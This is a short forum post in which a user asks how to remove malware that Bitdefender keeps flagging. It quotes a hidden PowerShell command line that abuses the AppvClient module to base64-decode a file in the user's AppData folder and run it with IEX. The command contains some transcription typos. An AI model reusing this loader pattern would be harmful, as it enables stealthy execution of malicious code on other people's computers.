powershell.exe malware. How do I remove it?

Over the last few days bitdefender has found 1 attack each day with the following:
powershell.exe
C:\Windows\ System32\WindowsPowerShell\v1.0
(Command line parameters: "C:\Windows\ System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &(env:psmodulepath = [Io.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync -AppvPublishingServer n; [strig]Scontent=[System.Text.Encoding]::UTF8:GetString([System.Convert]::FromBase64String(IO.File]::ReadA||Text(C:Users\Mark Schnegg\AppData\Roaming\logs.txt).Replace('-','')));IEX $content;))
wscript.exe
C:\Windows\System32
conhost
C:\Windows\System32
Disenfection successful: Open quarantine
Any idea what this is? How can I eliminate it?

Thanks
Tagged:

Answers

Sign In or Register to comment.